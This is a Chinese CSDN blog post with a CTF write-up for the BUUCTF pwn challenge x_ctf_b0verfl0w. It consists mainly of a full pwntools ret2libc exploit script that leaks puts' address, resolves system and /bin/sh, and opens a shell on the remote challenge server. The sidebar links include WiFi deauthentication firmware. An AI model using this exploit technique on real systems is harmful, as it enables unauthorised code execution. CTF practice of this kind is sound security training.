[BUUCTF-pwn]——x_ctf_b0verfl0w

最新推荐文章于 2024-05-16 11:03:26 发布
最新推荐文章于 2024-05-16 11:03:26 发布
阅读量577 收藏
点赞数 1
分类专栏: # BUUCTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/115261416
版权
本文详细介绍了如何通过栈溢出来实现ret2libc攻击,首先泄露puts函数地址,然后利用LibcSearcher找到系统和/bin/sh的地址,构造ROP链,最终成功获取shell。这是一个CTF比赛中的pwn题解过程。
摘要由CSDN通过智能技术生成

[BUUCTF-pwn]——x_ctf_b0verfl0w

在这里插入图片描述
很简单的一个ret2libc题型,利用栈溢出,构造循环调用
第一次leek地址,之后就可以构造我们想要的rop链了

exploit

from pwn import *
from LibcSearcher import *
#p = process('./b0verfl0w')
p = remote('node3.buuoj.cn',26806)
elf = ELF('./b0verfl0w')
context.log_level = 'debug'
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
#gdb.attach(p)
payload = 'a' * (0x20 + 4) + p32(puts_plt) +p32(0x0804850E) + p32(puts_got)
p.sendline(payload)

p.recvuntil('.')
puts_addr = u32(p.recv(4))
log.success("puts_addr ----> : " + hex(puts_addr))

libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
info("libc_base -----> " + hex(libc_base))
sys_addr = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")
payload1 = 'a' * (0x20 + 4) + p32(sys_addr) + p32(binsh) + p32(binsh)
p.sendline(payload1)
p.interactive()
Y-peak
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
x_ctf_b0verfl0w
qq_62887641的博客
09-19 94
32位,保护全关,写shellcode栈溢出并且有个hit给出了jmp esp。
x_ctf_b0verfl0ww
z1r0的博客
01-11 994
x_ctf_b0verfl0ww 查看保护 有溢出但是空间小不可以ret2libc。没开nx看见不有一个hint 有个jmp esp,这是一个好跳板,可以去看一下0day安全这个书,里面讲到了jmp esp的灵活运用。写shellcode进去,然后通过jmp esp 和 sub esp, xx,jmp esp来执行shellcode即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name
BUUCTF:Crypto 解析(一)
最新发布
Flag少侠的博客
05-16 2147
一眼就解密、MD5、URL 编码、看我回旋踢、摩丝、password、变异凯撒、Quoted-printable
【网络安全CTFBUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6323
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
BUUCTF】Misc题解
热门推荐
xuanyulevel6的博客
07-31 1万+
BUUCTF-Misc题解
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7830
BUUCTF题目Misc部分wp(持续更新)
CTFd-master_roseosy_ctf_
09-30
- **比赛管理**:CTFd 允许管理员创建不同类型的题目,包括但不限于 Web、Crypto、Reversing、Pwn 等,并设置分数和解题规则。 - **用户注册与管理**:用户可以注册参赛,管理员可以管理用户权限,查看用户得分和...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
BUUCTF Misc杂项前十二道题的思路和感悟
太阳照耀我走四方
08-18 1万+
title: BUUCTF Misc date: 2021年8月18日 17点27分 tags: MISC categories: MISC 1、BUUCTF 签到题 直接告诉了flag。 2、BUUCTF 第二题(Stegsolve) 下载附件之后,得到一个gif动图。 使用Stegsolve打开。 然后一张一张的向后翻, 得到flag{he11ohongke} 3、BUUCTF 二维码(QR Research、Ziperrllo、winhex) 下载附件之后是一个zip压缩包。 解压之后得到.
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”CTF,先入手杂项部分,
m0_73935461的博客
04-09 2554
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”CTF,先入手杂项部分,首先我们先看一些图片的解题思路 图片类型:包含,图片该高宽,文件头损坏,图片隐写(内有压缩包),或者用kali的strings看一下图片内容在进行。可以在文件头中查看。上面标记着png图片,但是文件类型是pk(zip),像这种类型的文件一般是有问题的,我们就可以把这种文件到处去,在进行文件分析。
BUUCTF-逆向
weixin_52125240的博客
04-11 5431
BUUCTF-ReBUUCTF-逆向1.easyre2.reverse13.reverse2 BUUCTF-逆向 1.easyre 先用虚拟机看看是多少位的文件; 拖进IDA看看,一下子就出来了; 2.reverse1 先用虚拟机看看是多少位的文件; 打开IDA,查找字符串; 点击View->Open subviews->Strings 然后观察伪代码 所有的 ’ o ’全都变成 ’ 0 ‘ ; flag{hell0_w0rld} 3.reverse2 一样的看看文件是多少位的;
CTF-MISC:BUUCTF练习汇总(1-25题,不包括签到题)
燕麦葡萄干的博客
07-30 4691
解题思路:该题比较基础,wireshark打开过滤HTTP流量包,追踪HTTP流后可以看到base64密文,解密后得到jpg图片,打开图片即可看到flag,在线OCR识别即可提取出flag值。解题思路:zip压缩包解压需要密码,图片中的盲文为解压的密码,解压后得到MP3音频文件,内容为典型的摩斯密码;解题思路:由题目可以为LSB隐写,使用StegSolve打开图片查看最低有效位得到PNG信息,另存为图片后发现是二维码,扫描后即可得到flag。对应摩斯电码为:-.-. - …-. .-- .–. . …
BUUCTF】Web题解
xuanyulevel6的博客
08-08 5251
BUUCTF】Web题解
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 409
buuctf-pwn 001-016题wp
BUUCTF--Web篇详细wp
Aluxian_的博客
04-10 4521
BUUCTF--Web篇详细wp。
X-CTF Quals 2016 - b0verfl0w [Stack Pivoting]
ACdream
02-13 883
学习资料: https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/fancy-rop/#stack-pivoting 为什么要使用? (1)栈溢出时,覆盖后剩下的栈空间不够写exp、ROP等溢出利用 (2)开启了PIE,栈地址不固定,没法利用 要求:可以控制EIP或ESP的至少一个,利用gadgets: pop esp...
mqtt-pwn安装
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值